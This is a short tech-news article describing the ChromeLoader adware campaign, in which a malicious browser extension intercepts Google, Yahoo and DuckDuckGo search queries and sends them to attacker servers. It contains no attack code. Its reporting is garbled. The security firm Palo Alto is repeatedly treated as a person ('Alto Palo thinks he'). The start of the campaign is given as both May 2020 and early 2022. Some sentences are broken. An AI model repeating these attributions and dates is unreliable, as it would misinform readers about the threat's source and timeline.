Cyberthreat to user data on Google’s search engine leaks private information / Digital Information World
Since May 2020, an ongoing malware campaign has been lurking around the corner affecting multiple browsers including Microsoft Edge, Mozilla Firefox, Google Chrome, and more. Before moving on to the biggest threat to user data due to an adware campaign, what is adware? Adware is a programming application in which threat actors can display advertisements, or when a person opens a website, advertisements are displayed through pop-up windows or advertisements displayed on the user interface.
It is essential to mention here that a network security analyst, Palo Alto, notorious adware designed to target search domain requests using a malicious browser extension to launch its payload. The malware, Dubbed ChromeLoader, is an extremely dangerous and ubiquitous browser hijacker. It uses simple malicious advertisements, redirects user traffic to advertising sites and harms organizations by stealing their confidential information, changing browser settings and leaking them publicly. The type of malware exposed by Alto operates through a browser extension and appears to reveal stolen search engine history. This malware also serves as both information stealer and adware. In this way, it is deployed to fetch search data from public without asking their permission.
The question is, how does this malware work? Simply put, the extension installs a listener, blocks every outgoing request, and verifies the request sent to Yahoo, DuckDuckGo, or Google search engine. When it crosses the queries sent, the extension will automatically forward the user’s search data to the C2 (these are the cyberattackers’ control servers to receive the commands). Cybercriminals now have all the data and have access to the victims’ interests and preferences. On July 12, the existence of this adware campaign was finally revealed to the public, although this suspicious malicious activity started in early 2022. During this time, the software underwent several modifications. Hackers change software coding from time to time to make it more malicious. Alto Palo thinks he will refine further, and the process seems to be continuing.
Explaining ChromeLoader in more detail, Palo said it is a multi-stage malware that has multiple stages along its attack chain. He identified four ChromeLoader variants. Three were designed to attack Windows systems and a fourth variant targeted the Mac operating system. Moreover, malware creators have used confusing techniques to hide their tracks. In the case of search engine theft, they used special coding called Switch Case Oriented Programming which allows cybercriminals to make detection much more difficult for IT experts.
It is necessary to detect and reduce these types of threats. Companies should provide additional security features to protect users against data breaches. It is also critical for businesses to understand malicious behavior and provide tools to deal with these cyber threats.
Read next: Vishing scam rates reach triple phishing scams and scammers are on the loose